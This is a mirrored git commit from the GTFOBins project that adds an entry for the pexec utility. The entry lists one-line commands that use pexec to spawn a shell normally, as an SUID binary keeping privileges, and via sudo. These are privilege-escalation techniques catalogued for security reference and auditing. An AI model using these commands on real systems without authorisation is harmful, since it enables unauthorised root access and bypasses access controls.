mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-08-23 17:44:49 +02:00
add pexec
install: apt-get install -y pexec man: https://manpages.ubuntu.com/manpages/trusty/man1/pexec.1.html
This commit is contained in:
9
_gtfobins/pexec.md
Normal file
9
_gtfobins/pexec.md
Normal file
@@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: pexec /bin/sh
|
||||
suid:
|
||||
- code: ./pexec /bin/sh -p
|
||||
sudo:
|
||||
- code: sudo pexec /bin/sh
|
||||
---
|
Reference in New Issue
Block a user